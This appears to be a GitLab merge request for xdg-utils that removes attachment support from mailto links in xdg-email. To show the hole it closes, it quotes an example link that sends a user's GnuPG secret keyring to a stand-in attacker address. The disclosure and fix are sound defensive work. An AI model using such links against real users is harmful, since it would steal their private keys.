Skip to content

xdg-email: remove attachment handling from mailto

Jörg Thalheim requested to merge Mic92/xdg-utils:fix-mailto into master

This allows attacker to extract secrets from users:

mailto:sid@evil.com?attach=/.gnupg/secring.gpg

See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425 and #177

Signed-off-by: Jörg Thalheim joerg@thalheim.io

Merge request reports

Loading